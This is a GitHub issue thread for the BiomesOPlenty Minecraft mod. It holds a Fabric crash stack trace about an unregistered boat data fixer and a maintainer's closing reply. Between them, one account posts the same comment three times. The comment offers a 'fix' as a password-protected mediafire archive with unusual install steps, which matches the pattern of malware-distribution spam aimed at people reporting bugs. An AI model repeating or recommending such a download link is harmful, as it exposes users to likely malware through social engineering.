### ISSUE TITLE
biomesoplenty:boat

### ISSUE THREAD

**Issue by JoshBeCute** [Glitchfiend/BiomesOPlenty#2260]
### What's the issue you encountered?

java.lang.RuntimeException: Could not execute entrypoint stage 'main' due to errors, provided by 'glitchcore' at 'glitchcore.fabric.core.GlitchCoreFabric'!
	at net.fabricmc.loader.impl.FabricLoaderImpl.lambda$invokeEntrypoints$2(FabricLoaderImpl.java:403)
	at net.fabricmc.loader.impl.util.ExceptionUtil.gatherExceptions(ExceptionUtil.java:33)
	at net.fabricmc.loader.impl.FabricLoaderImpl.invokeEntrypoints(FabricLoaderImpl.java:401)
	at net.fabricmc.loader.impl.game.minecraft.Hooks.startClient(Hooks.java:52)
	at net.minecraft.class_310.<init>(class_310.java:477)
	at net.minecraft.client.main.Main.main(Main.java:239)
	at net.fabricmc.loader.impl.game.minecraft.MinecraftGameProvider.launch(MinecraftGameProvider.java:480)
	at net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:74)
	at net.fabricmc.loader.impl.launch.knot.KnotClient.main(KnotClient.java:23)
Caused by: java.lang.IllegalArgumentException: Data fixer not registered for: biomesoplenty:boat in entity_tree
	at com.mojang.datafixers.schemas.Schema.getChoiceType(Schema.java:109)
	at net.minecraft.class_1220.getChoiceType(class_1220.java:52)
	at net.minecraft.class_156.method_29191(class_156.java:270)
	at net.minecraft.class_156.method_29187(class_156.java:263)
	at net.minecraft.class_1299$class_1300.mixinextras$bridge$method_29187$31(class_1299.java)
	at net.minecraft.class_1299$class_1300.wrapOperation$bda000$fabric-object-builder-api-v1$allowNullId(class_1299.java:976)

### How can the issue be reproduced?

data fix for biomesoplenty:boat

### Logs

https://gist.github.com/JoshBeCute/442cd69e4a612cb181466dda92c7392d

### Mod Version

21.1.0.2 for Fabric 1.21.1

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Forstride** [comment]
Closed due to the issue being for a version we no longer support.
